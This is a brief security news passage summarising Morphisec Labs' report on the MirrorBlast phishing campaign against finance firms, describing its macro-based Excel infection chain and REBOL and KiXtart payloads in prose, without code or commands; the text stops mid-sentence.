A fresh variant of a phishing campaign has been recently detected. By its nickname MirrorBlast, its targets are finance enterprises. The attack methods it uses consist of malicious Excel documents that are almost untraceable.
MirrorBlast: How Does It Work?
The researchers who discovered this new phishing campaign were those from Morphisec Labs and according to their report, here is how MirrorBlast works:
It uses an obfuscated malicious code; Only a 32-bit Office version can be used to execute the macro code; After the target opens the compromised file and clicks on “enable content” a JScript script is executed by the macro; Then this triggers an MSI package downloading and installing; However, before this, an anti-sandboxing check is performed by the macro: this has the role to establish if computer name and user domain are the same things and if the user name is the same as “admin”; The MSI package will have two versions: one features the programming language REBOL, the other KiXtart. REBOL version: base64 encoded, it has the role of data exfiltration, for instance: OS version, user name, or architecture. The second stage where PowerShell is initiated through the C2 command follows. KiXtart version has also the
